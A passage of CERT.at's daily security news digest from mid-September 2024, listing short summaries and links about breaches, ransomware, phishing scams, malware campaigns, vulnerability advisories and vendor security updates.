GreyNoise has observed millions of spoofed IPs flooding internet providers with web traffic primarily focusing on TCP connections.
---------------------------------------------
https://www.securityweek.com/noise-storms-massive-amounts-of-spoofed-web-tr…
∗∗∗ Beware of fake ÖAMTC and ADAC prize draws ∗∗∗
---------------------------------------------
Be careful if you receive an e-mail about a prize draw for a car emergency kit. Criminals pose as ÖAMTC or ADAC and claim you have won a car emergency kit. Do not click the link: you will be lured into a subscription trap!
---------------------------------------------
https://www.watchlist-internet.at/news/gefaelschte-gewinnspiele-oeamtc-adac/
∗∗∗ Data theft via Slack: Disney discontinues use of the messaging service ∗∗∗
---------------------------------------------
The hacker group Nullbulge was able to steal and publish source code and details about unreleased projects.
---------------------------------------------
https://www.derstandard.at/story/3000000237370/datendiebstahl-disney-trennt…
∗∗∗ High-risk vulnerabilities in common enterprise technologies ∗∗∗
---------------------------------------------
Rapid7 is warning customers about high-risk vulnerabilities in Adobe ColdFusion, Broadcom VMware vCenter Server, and Ivanti Endpoint Manager (EPM). These CVEs are likely attack targets for APT and/or financially motivated adversaries.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/09/19/etr-high-risk-vulnerabilities-i…
∗∗∗ Youth hostels apparently victims of the Hunters ransomware gang ∗∗∗
---------------------------------------------
At the end of August, around 450 German youth hostels experienced disruptions. The cause was unclear. A ransomware attack is apparently to blame.
---------------------------------------------
https://heise.de/-9938226
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-5773-1 chromium - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00186.html
∗∗∗ OpenSSH 9.9 released ∗∗∗
---------------------------------------------
https://lwn.net/Articles/991028/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 18-09-2024 18:00 − Thursday 19-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Clever GitHub Scanner campaign abusing repos to push malware ∗∗∗
---------------------------------------------
A clever threat campaign is abusing GitHub repositories to distribute the Lumma Stealer password-stealing malware targeting users who frequent an open source project repository or are subscribed to email notifications from it. [..] The domain, github-scanner[.]com is not affiliated with GitHub and is being used to deliver malware to visitors.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/clever-github-scanner-campai…
∗∗∗ Security expert: we need not fear exploding phones ∗∗∗
---------------------------------------------
After the waves of explosions in Lebanon, some people are now worried about their own smartphones. Cyber expert Joe Pichelmayr, however, sees little danger there.
---------------------------------------------
https://futurezone.at/digital-life/sicherheitsexperte-handys-smartphone-exp…
∗∗∗ Google Cloud Document AI flaw (still) allows data theft despite bounty payout ∗∗∗
---------------------------------------------
Overly permissive settings in Google Cloud's Document AI service could be abused by data thieves to break into Cloud Storage buckets and steal sensitive information. [..] A Google spokesperson has told us in response to the above: [..] We developed a fix and are actively working to roll it out.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/09/17/google_cloud…
∗∗∗ Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware ∗∗∗
---------------------------------------------
In this blog, we’ll examine the mechanics of AsyncRAT, how it spreads by masquerading as cracked software, and the steps you can take to protect yourself from this increasingly common cyber threat.
---------------------------------------------
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cracked-software-or-cy…
∗∗∗ Solar Cybersecurity And The Nuances Of Renewable Energy Integration ∗∗∗
---------------------------------------------
The modern age of renewable energy has seen a surge in solar panels and wind turbines. While these systems enhance sustainability, their digital technologies carry risks. Cybersecurity professionals must know the relevant nuances when integrating renewable systems.
---------------------------------------------
https://www.tripwire.com/state-of-security/solar-cybersecurity-and-nuances-…
∗∗∗ Discovering Splinter: A First Look at a New Post-Exploitation Red Team Tool ∗∗∗
---------------------------------------------
Discover Splinter, a new post-exploitation tool with advanced features like command execution and file manipulation, detected by Unit 42 researchers.
---------------------------------------------
https://unit42.paloaltonetworks.com/analysis-pentest-tool-splinter/
∗∗∗ Fraud case involving the tegut teo app and a fictitious employee number ∗∗∗
---------------------------------------------
In court the defendant said: "I was unemployed at the time. There is an app for the stores, and under payment methods you could store the employee number as a card. I simply tried a random number, and it worked right away."
---------------------------------------------
https://www.borncity.com/blog/2024/09/19/betrugsfall-mit-tegut-teo-app-und-…
∗∗∗ Current phishing scheme: request for a phone appointment with a supposed Sparkasse ∗∗∗
---------------------------------------------
The Verbraucherzentrale NRW (North Rhine-Westphalia consumer advice centre) warns of a current phishing scheme. Supposedly, the Sparkasse wants to schedule an appointment for a phone call.
---------------------------------------------
https://heise.de/-9909574
∗∗∗ Discord launches end-to-end encryption for audio and video chats ∗∗∗
---------------------------------------------
To protect privacy, the online service Discord now encrypts certain forms of message exchange end to end.
---------------------------------------------
https://heise.de/-9909594
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#138043: A stack-based overflow vulnerability exists in the Microchip Advanced Software Framework (ASF) implementation of the tinydhcp server ∗∗∗
---------------------------------------------
CVE-2024-7490: There exists a vulnerability in all publicly available examples of the ASF codebase that allows a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution.
---------------------------------------------
https://kb.cert.org/vuls/id/138043
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (expat and tinyproxy), Fedora (frr, microcode_ctl, python3.10, python3.12, python3.6, and ruby), Oracle (expat, fence-agents, firefox, ghostscript, java-1.8.0-openjdk, kernel, and thunderbird), Red Hat (firefox, openssl, ruby:3.3, and thunderbird), SUSE (clamav, ffmpeg-4, kernel, libmfx, python3, python312, runc, ucode-intel, and wireshark), and Ubuntu (apache2, git, linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-nvidia, linux-oracle, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, and linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle).
---------------------------------------------
https://lwn.net/Articles/990877/
∗∗∗ GitLab Patches Critical Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
GitLab has patched a critical-severity SAML authentication bypass affecting both Community Edition (CE) and Enterprise Edition (EE) instances. [..] The issue, tracked as CVE-2024-45409 (CVSS score of 10/10), only affects GitLab CE/EE instances that have been configured to use SAML-based authentication.
---------------------------------------------
https://www.securityweek.com/gitlab-patches-critical-authentication-bypass-…
∗∗∗ DSA-5772-1 libreoffice - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00185.html
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 9, 2024 to September 15, 2024) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2024/09/wordfence-intelligence-weekly-wordpr…
∗∗∗ MegaSys Computer Technologies Telenium Online Web Application ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-04
∗∗∗ IDEC PLCs ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-02
∗∗∗ Kastle Systems Access Control System ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-05
∗∗∗ IDEC CORPORATION WindLDR and WindO/I-NV4 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-03
∗∗∗ Rockwell Automation RSLogix 5 and RSLogix 500 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-01
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 17-09-2024 18:00 − Wednesday 18-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Construction firms breached in brute force attacks on accounting software ∗∗∗
---------------------------------------------
Hackers are brute-forcing passwords for highly privileged accounts on exposed Foundation accounting servers, widely used in the construction industry, to breach corporate networks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/construction-firms-breached-…
∗∗∗ Temu denies breach after hacker claims theft of 87 million data records ∗∗∗
---------------------------------------------
Temu denies it was hacked or suffered a data breach after a threat actor claimed to be selling a stolen database containing 87 million records of customer information.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/temu-denies-breach-after-hac…
∗∗∗ Sandbox scores are not an antivirus replacement ∗∗∗
---------------------------------------------
Automatic sandbox services should not be treated like "antivirus scanners" to determine maliciousness for samples. That’s not their intended use, and they perform poorly in that role. Unfortunately, providing an "overall score" or "verdict" is misleading.
---------------------------------------------
https://www.gdatasoftware.com/blog/2024/09/38031-sandbox-scores-are-not-an-…
∗∗∗ Vanir Locker: German police take over a hacker group's Tor site ∗∗∗
---------------------------------------------
Anyone who visits the data leak site of the Vanir Locker ransomware group now finds a notice from the LKA (State Criminal Police Office) there. The site has been seized.
---------------------------------------------
https://www.golem.de/news/lka-baden-wuerttemberg-polizei-uebernimmt-leak-se…
∗∗∗ Python Infostealer Patching Windows Exodus App, (Wed, Sep 18th) ∗∗∗
---------------------------------------------
A few months ago, I wrote a diary about a Python script that replaced the Exodus Wallet app with a rogue one on macOS. Infostealers are everywhere these days. They target mainly browsers (cookies, credentials) and classic applications that may handle sensitive information. Cryptocurrency wallets are another category of applications ..
---------------------------------------------
https://isc.sans.edu/forums/diary/Python+Infostealer+Patching+Windows+Exodu…
∗∗∗ VMware patches remote make-me-root holes in vCenter Server, Cloud Foundation ∗∗∗
---------------------------------------------
Bug reports made in China. Broadcom has emitted a pair of patches for vulnerabilities in VMware vCenter Server that a miscreant with network access to the software could exploit to completely commandeer a system. This also affects Cloud Foundation.
---------------------------------------------
https://www.theregister.com/2024/09/17/vmware_vcenter_patch/
∗∗∗ Australian Police conducted supply chain attack on criminal collaborationware ∗∗∗
---------------------------------------------
Sting led to cuffing of alleged operator behind Ghost, an app for drug trafficking, money laundering, and violence-as-a-service. Australia's Federal Police (AFP) yesterday arrested and charged a man with creating and administering an app named Ghost that was allegedly "a dedicated encrypted communication platform … built solely for the criminal underworld" and ..
---------------------------------------------
https://www.theregister.com/2024/09/18/afp_operation_kraken_ghost_crimeware…
∗∗∗ Did a Chinese University Hacking Competition Target a Real Victim? ∗∗∗
---------------------------------------------
Participants in a hacking competition with ties to China’s military were, unusually, required to keep their activities secret, but security researchers say the mystery only gets stranger from there.
---------------------------------------------
https://www.wired.com/story/china-hacking-competition-real-victim/
∗∗∗ Scam ‘Funeral Streaming’ Groups Thrive on Facebook ∗∗∗
---------------------------------------------
Scammers are flooding Facebook with groups that purport to offer video streaming of funeral services for the recently deceased. Friends and family who follow the links for the streaming services are then asked to cough up their credit card information. Recently, these scammers have branched out into offering fake streaming services for nearly any ..
---------------------------------------------
https://krebsonsecurity.com/2024/09/scam-funeral-streaming-groups-thrive-on…
∗∗∗ Russian Security Firm Doctor Web Hacked ∗∗∗
---------------------------------------------
Antimalware company Doctor Web was recently targeted in a cyberattack that prompted it to disconnect all resources from its networks.
---------------------------------------------
https://www.securityweek.com/russian-security-firm-doctor-web-discloses-tar…
∗∗∗ North Korean Hackers Lure Critical Infrastructure Employees With Fake Jobs ∗∗∗
---------------------------------------------
A North Korean group tracked as UNC2970 has been spotted trying to deliver new malware to people in the aerospace and energy industries.
---------------------------------------------
https://www.securityweek.com/north-korean-hackers-lure-critical-infrastruct…
∗∗∗ Cyber threats to shipping explained ∗∗∗
---------------------------------------------
TL;DR: Modern vessels are becoming increasingly connected. While it is unlikely that hackers could fully control a container ship remotely, they may be able to disrupt systems such as the […]
---------------------------------------------
https://www.pentestpartners.com/security-blog/cyber-threats-to-shipping-exp…
∗∗∗ Vulnerabilities in Cellular Packet Cores Part IV: Authentication ∗∗∗
---------------------------------------------
Our research reveals two significant vulnerabilities in Microsoft Azure Private 5G Core (AP5GC). The first vulnerability (CVE-2024-20685) allows a crafted signaling message to crash the control plane, leading to potential service outages. The second (ZDI-CAN-23960) disconnects and replaces attached base stations, disrupting network operations. While these ..
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/i/vulnerabilities-in-cellular-…
∗∗∗ RAMBO Attack: Electromagnetic Waves Steal Data from Air-Gapped Systems ∗∗∗
---------------------------------------------
Air-gapped systems, once considered immune to attacks, are now vulnerable. Learn about a groundbreaking new method that ..
---------------------------------------------
https://hackread.com/rambo-attack-electromagnetic-waves-data-air-gapped-sys…
∗∗∗ CISA KEV performance in the Financial Sector ∗∗∗
---------------------------------------------
I’ve had a number of requests to examine the finance sector in more detail, including breakdowns of exactly what kind of financial organizations are experiencing greater risk and who is remediating more quickly. Here are some answers.
---------------------------------------------
https://www.bitsight.com/blog/cisa-kev-performance-financial-sector
=====================
= Vulnerabilities =
=====================
∗∗∗ Multiple vulnerabilities in WordPress plugin "Welcart e-Commerce" ∗∗∗
---------------------------------------------
WordPress plugin "Welcart e-Commerce" provided by Welcart Inc. contains multiple vulnerabilities.
---------------------------------------------
https://jvn.jp/en/jp/JVN19766555/
∗∗∗ Apple Releases Security Updates for Multiple Products ∗∗∗
---------------------------------------------
Apple released security updates to address vulnerabilities in multiple Apple products. A cyber threat actor could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the following ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/09/18/apple-releases-security-…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 16-09-2024 18:00 − Tuesday 17-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Exploit code released for critical Ivanti RCE flaw, patch now ∗∗∗
---------------------------------------------
A proof-of-concept (PoC) exploit for CVE-2024-29847, a critical remote code execution (RCE) vulnerability in Ivanti Endpoint Manager, is now publicly released, making it crucial to update devices.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/exploit-code-released-for-cr…
∗∗∗ Emergency Accounts: Last Call! ∗∗∗
---------------------------------------------
Even if you have been out of the office for the last couple of months, you should be aware that starting October 15th you will need to provide Multi-Factor Authentication (MFA) to log on to the Azure portal, Entra admin center and Intune admin center. This will be enforced for all users accessing these resources regardless of their role or permission level. [..] With Microsoft’s new MFA enforcement, you need a different approach for emergency accounts.
---------------------------------------------
https://blog.nviso.eu/2024/09/17/emergency-accounts-last-call/
∗∗∗ Secure Boot-neutering PKfail debacle is more prevalent than anyone knew ∗∗∗
---------------------------------------------
A supply chain failure that compromises Secure Boot protections on computing devices from across the device-making industry extends to a much larger number of models than previously known, including those used in ATMs, point-of-sale terminals, and voting machines.
---------------------------------------------
https://arstechnica.com/?p=2050182
∗∗∗ Check24 and Verivox: sensitive data of borrowers easily accessible online ∗∗∗
---------------------------------------------
An expert discovered security flaws at two well-known comparison portals. As a result, loan offers containing sensitive data are said to have been freely retrievable. [..] The data mentioned included names and addresses as well as details of employment, income and number of children.
---------------------------------------------
https://www.golem.de/news/check24-und-verivox-sensible-daten-von-kreditnehm…
∗∗∗ What to Do With Products Without SSO? ∗∗∗
---------------------------------------------
Let’s start with the role that SSO plays in modern defense architecture, and then cover how to implement similar security measures without such a centralized mechanism.
---------------------------------------------
https://zeltser.com/products-without-sso/
∗∗∗ Cyber predators target vulnerable victims: Hackers blackmail hospitals, trade patient data and find partners through darknet ads ∗∗∗
---------------------------------------------
According to data from Check Point Research (CPR), from January – September 2024, the global weekly average number of attacks per organization within the healthcare industry was 2,018, representing a 32% increase, compared to the same period last year.
---------------------------------------------
https://blog.checkpoint.com/research/cyber-predators-target-vulnerable-vict…
∗∗∗ ‘Clipper’ malware is being used to steal crypto, Binance warns ∗∗∗
---------------------------------------------
Binance is warning customers that malware is being used to manipulate withdrawal addresses in order to steal cryptocurrency, in a campaign that has led to “significant financial losses for victims.”
---------------------------------------------
https://therecord.media/clipper-malware-binance-stealing-crypto
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (php-twig and pymongo), Fedora (linux-firmware, microcode_ctl, and python3.13), Mageia (clamav, microcode, postgresql13 and postgresql15, python3-webob, suricata, tcpreplay, tgt, and wireshark), Oracle (httpd, kernel, and linux-kernel), Red Hat (firefox, kernel, kernel-rt, pcs, and thunderbird), SUSE (389-ds, chromium, golang-github-prometheus-prometheus, htmldoc, kernel, SUSE Manager Client Tools, and wireshark), and Ubuntu (clamav, curl, dcmtk, dovecot, nginx, openssh, and python3.10, python3.12, python3.8).
---------------------------------------------
https://lwn.net/Articles/990588/
∗∗∗ Apple Patches Major Security Flaws With iOS 18 Refresh ∗∗∗
---------------------------------------------
Apple warns that attackers can use Siri to access sensitive user data, control nearby devices, or view recent photos without authentication. According to a bulletin from Cupertino, iOS 18 has been fitted with fixes for vulnerabilities in core components including accessibility features, Bluetooth, Control Center, and Wi-Fi, with several flaws allowing unauthorized access to sensitive data or full device control.
---------------------------------------------
https://www.securityweek.com/apple-patches-major-security-flaws-with-ios-18…
∗∗∗ Security patch: backdoor in some D-Link routers allows unauthorized access ∗∗∗
---------------------------------------------
Attackers can attack and compromise certain D-Link router models. Security updates are available for download.
---------------------------------------------
https://heise.de/-9870648
∗∗∗ MISP 2.4.198 released with many bugs fixed, security fixes and improvements. ∗∗∗
---------------------------------------------
https://www.misp-project.org/2024/09/17/MISP.2.4.198.released.html/
∗∗∗ Yokogawa Dual-redundant Platform for Computer (PC2CKM) ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-261-03
∗∗∗ Millbeck Communications Proroute H685t-w ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-261-02
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 13-09-2024 18:00 − Monday 16-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ 1.3 million Android-based TV boxes backdoored; researchers still don’t know how ∗∗∗
---------------------------------------------
Infection corrals devices running AOSP-based firmware into a botnet.
---------------------------------------------
https://arstechnica.com/?p=2049773
∗∗∗ Malware locks browser in kiosk mode to steal Google credentials ∗∗∗
---------------------------------------------
A malware campaign uses the unusual method of locking users in their browser's kiosk mode to annoy them into entering their Google credentials, which are then stolen by information-stealing malware.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/malware-locks-browser-in-kio…
∗∗∗ After cyberattack: hackers post Kawasaki data on the darknet ∗∗∗
---------------------------------------------
Kawasaki itself claims the cyberattack was "not successful". Nevertheless, almost 500 GB of company data has surfaced on the darknet.
---------------------------------------------
https://www.golem.de/news/nach-cyberangriff-hacker-stellen-daten-von-kawasa…
∗∗∗ Australia Threatens to Force Companies to Break Encryption ∗∗∗
---------------------------------------------
In 2018, Australia passed the Assistance and Access Act, which - among other things - gave the government the power to force companies to break their own encryption. The Assistance and Access Act includes key components that outline investigatory powers between government and industry. These components include: Technical Assistance ..
---------------------------------------------
https://www.schneier.com/blog/archives/2024/09/australia-threatens-to-force…
∗∗∗ Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks ∗∗∗
---------------------------------------------
Cybersecurity researchers have warned of ongoing phishing campaigns that abuse refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials. "Unlike other phishing webpage ..
---------------------------------------------
https://thehackernews.com/2024/09/cybercriminals-exploit-http-headers-for.h…
∗∗∗ Prison just got rougher as band of heinously violent cybercrims sentenced to lengthy stints ∗∗∗
---------------------------------------------
Orchestrators of abductions, torture, crypto thefts, and more get their comeuppance. One cybercriminal of the most violent kind will spend his best years behind bars, as will 11 of his thug pals for a string of cryptocurrency robberies in the US.
---------------------------------------------
https://www.theregister.com/2024/09/16/prison_just_got_rougher_as/
∗∗∗ Germany’s CDU still struggling to restore data months after June cyberattack ∗∗∗
---------------------------------------------
Putting a spanner in work for plans of opposition party to launch a comeback during next year's elections. One of Germany's major political parties is still struggling to restore member data more than three months after a June cyberattack targeting its systems.
---------------------------------------------
https://www.theregister.com/2024/09/16/nein_luck_for_germanys_cdu/
∗∗∗ Acquiring Malicious Browser Extension Samples on a Shoestring Budget ∗∗∗
---------------------------------------------
A friend of mine sent me a link to an article on malicious browser extensions that worked around Google Chrome Manifest V3 and asked if I had or could acquire a sample. In the process of getting a sample, I thought, if I was someone who didn’t have the paid resources that an enterprise might have, how would ..
---------------------------------------------
https://pberba.github.io/crypto/2024/09/14/malicious-browser-extension-gene…
∗∗∗ Acute wave of DDoS attacks against Austrian companies and organizations ∗∗∗
---------------------------------------------
Recently, various Austrian companies and organizations from different industries and sectors have been confronted with DDoS attacks. The exact background of the attack is currently unknown to us, but there are indications of a hacktivist motivation. In light of the current events we recommend ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/9/ddos-angriffe-september-2024
∗∗∗ German radio station forced to broadcast emergency tape following cyberattack ∗∗∗
---------------------------------------------
Radio Geretsried, a local station in Germany, has blamed “unknown attackers from Russia” after an apparent ransomware incident left it broadcasting music from emergency backups.
---------------------------------------------
https://therecord.media/germany-cyberattack-radio-geretsried
∗∗∗ Small Devices, Big Threats: The Dark Side of Removable Devices ∗∗∗
---------------------------------------------
Our new article highlights the security risks of removable devices like USB drives and SD cards, exploring real-world threats and offering key cybersecurity tips to protect sensitive data.
---------------------------------------------
https://www.emsisoft.com/en/blog/45977/small-devices-big-threats-the-dark-s…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (git, nodejs, and ring), Fedora (apr, bubblewrap, chromium, clamav, flatpak, mingw-expat, python3-docs, python3.12, and thunderbird), Mageia (assimp, botan2, python-tqdm, and radare2), Slackware (libarchive), and SUSE (curl).
---------------------------------------------
https://lwn.net/Articles/990455/
∗∗∗ MISP 2.4.198 released with bug and security fixes. ∗∗∗
---------------------------------------------
Based on a set of fixes including a security fix, we are pleased to announce the immediate availability of MISP 2.4.198. You can find a list of the detailed changes along with new features further below. As with any security release, we highly encourage everyone to update their instance as soon as ..
---------------------------------------------
https://github.com/MISP/MISP/releases/tag/v2.4.198
∗∗∗ ZDI-24-1226: mySCADA myPRO Hard-Coded Credentials Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1226/
∗∗∗ ZDI-24-1225: SolarWinds Access Rights Manager Hard-Coded Credentials Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1225/
∗∗∗ ZDI-24-1224: SolarWinds Access Rights Manager JsonSerializationBinder Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1224/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 12-09-2024 18:00 − Friday 13-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Distributed Denial of Truth (DDoT): The Mechanics of Influence Operations and The Weaponization of Social Media ∗∗∗
---------------------------------------------
With the US election on the horizon, it’s a good time to explore the concept of social media weaponization and its use in asymmetrically manipulating public opinion through bots, automation, AI, and shady new tools in what Trustwave SpiderLabs has dubbed the Distributed Denial of Truth (DDoT).
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/distributed…
∗∗∗ Fortinet Confirms Limited Data Breach After Hacker Leaks 440 GB of Data ∗∗∗
---------------------------------------------
A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint vulnerability. The breach, dubbed “Fortileak,” was revealed on a forum with access credentials shared online. [..] Fortinet has now published a blog post addressing the incident, which only affected less than 0.3% of its customers.
---------------------------------------------
https://hackread.com/fortinet-confirms-data-breach-hacker-data-leak/
∗∗∗ After CrowdStrike: Microsoft plans to remove security solutions from the Windows kernel ∗∗∗
---------------------------------------------
Microsoft has outlined initial plans for how Windows systems can be hardened so that a broken update of an endpoint security solution does not drag the entire operating system down with it.
---------------------------------------------
https://www.borncity.com/blog/2024/09/13/nach-crowdstrike-microsoft-plant-s…
∗∗∗ I stole 20 GB of data from Capgemini – and now I'm leaking it, says cybercrook ∗∗∗
---------------------------------------------
A miscreant claims to have broken into Capgemini and leaked a large amount of sensitive data stolen from the technology services giant – including source code, credentials, and T-Mobile's virtual machine logs.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/09/12/capgemini_br…
∗∗∗ 1.3 Million Android TV Boxes Infected by Vo1d Malware ∗∗∗
---------------------------------------------
Doctor Web warns of the new Vo1d Android malware infecting roughly 1.3 million TV boxes running older OS versions.
---------------------------------------------
https://www.securityweek.com/1-3-million-android-tv-boxes-infected-by-vo1d-…
∗∗∗ CVE-2024-29847 Deep Dive: Ivanti Endpoint Manager AgentPortal Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On September 12th, 2024, ZDI and Ivanti released an advisory describing a deserialization vulnerability resulting in remote code execution with a CVSS score of 9.8. In this post we detail the internal workings of this vulnerability.
---------------------------------------------
https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-di…
∗∗∗ The Dark Nexus Between Harm Groups and ‘The Com’ ∗∗∗
---------------------------------------------
A cyberattack that shut down two of the top casinos in Las Vegas last year quickly became one of the most riveting security stories of 2023. It was the first known case of native English-speaking hackers in the United States and Britain teaming up with ransomware gangs based in Russia. But that made-for-Hollywood narrative has eclipsed a far more hideous trend: Many of these young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others.
---------------------------------------------
https://krebsonsecurity.com/2024/09/the-dark-nexus-between-harm-groups-and-…
∗∗∗ Woo Skimmer Uses Style Tags and Image Extension to Steal Card Details ∗∗∗
---------------------------------------------
This post starts the same way many others do on this blog, and it will be familiar to those who keep up with website security: A client came to us having been notified by their payment processor that credit cards were being stolen from the checkout page of their eCommerce website. The question of course was how? During this investigation we uncovered a very interesting (and in fact, creative) way that threat actors were pilfering credit card details from this compromised website.
---------------------------------------------
https://blog.sucuri.net/2024/09/woo-skimmer-uses-style-tags-and-image-exten…
∗∗∗ We can try to bridge the cybersecurity skills gap, but that doesn’t necessarily mean more jobs for defenders ∗∗∗
---------------------------------------------
I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.
---------------------------------------------
https://blog.talosintelligence.com/threat-source-newsletter-sept-12-2024/
∗∗∗ FBI and CISA Release Joint PSA, Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections ∗∗∗
---------------------------------------------
As observed through multiple election cycles, foreign actors and cybercriminals continue to spread false information through various platforms to manipulate public opinion, discredit the electoral process, and undermine confidence in U.S. democratic institutions. The FBI and CISA continue to work closely with federal, state, local, and territorial election partners and provide services and information to safeguard U.S. voting processes and maintain the resilience of the U.S. elections.
---------------------------------------------
https://www.cisa.gov/news-events/news/fbi-and-cisa-release-joint-psa-just-s…
=====================
= Vulnerabilities =
=====================
NTR
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 11-09-2024 18:00 − Thursday 12-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ GitLab warns of critical pipeline execution vulnerability ∗∗∗
---------------------------------------------
GitLab has released critical updates to address multiple vulnerabilities, the most severe of them (CVE-2024-6678) allowing an attacker to trigger pipelines as arbitrary users under certain conditions.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-pip…
∗∗∗ Security package: CCC threatens to publish guides on sabotaging surveillance ∗∗∗
---------------------------------------------
Civil society associations are outraged over the federal government's security package. The "cheap populism" plays into the hands of right-wing extremists.
---------------------------------------------
https://www.golem.de/news/sicherheitspaket-ccc-droht-mit-anleitungen-zur-ue…
∗∗∗ SiteCheck Remote Website Scanner — Mid-Year 2024 Report ∗∗∗
---------------------------------------------
Conducting an external website scan for indicators of compromise is one of the easiest ways to identify security issues. While remote website scanners may not provide as comprehensive of a scan as server-side scanners, ..
---------------------------------------------
https://blog.sucuri.net/2024/09/sitecheck-remote-website-scanner-mid-year-2…
∗∗∗ DragonRank Black Hat SEO Campaign Targeting IIS Servers Across Asia and Europe ∗∗∗
---------------------------------------------
A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation. The black hat SEO ..
---------------------------------------------
https://thehackernews.com/2024/09/dragonrank-black-hat-seo-campaign.html
∗∗∗ Exposed Selenium Grid Servers Targeted for Crypto Mining and Proxyjacking ∗∗∗
---------------------------------------------
Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns. "Selenium Grid is a server that facilitates running test cases in parallel ..
---------------------------------------------
https://thehackernews.com/2024/09/exposed-selenium-grid-servers-targeted.ht…
∗∗∗ Transport for London confirms 5,000 user bank data exposed, pulls large chunks of IT infra offline ∗∗∗
---------------------------------------------
Hauling in 30,000 staff IN PERSON to do password resets. Breaking: Transport for London's ongoing cyber incident has taken a dark turn as the organization confirmed that some data, including bank details, might have been accessed, and 30,000 employees' passwords will need to be reset via in-person appointments.
---------------------------------------------
https://www.theregister.com/2024/09/12/transport_for_londons_cyber_attack/
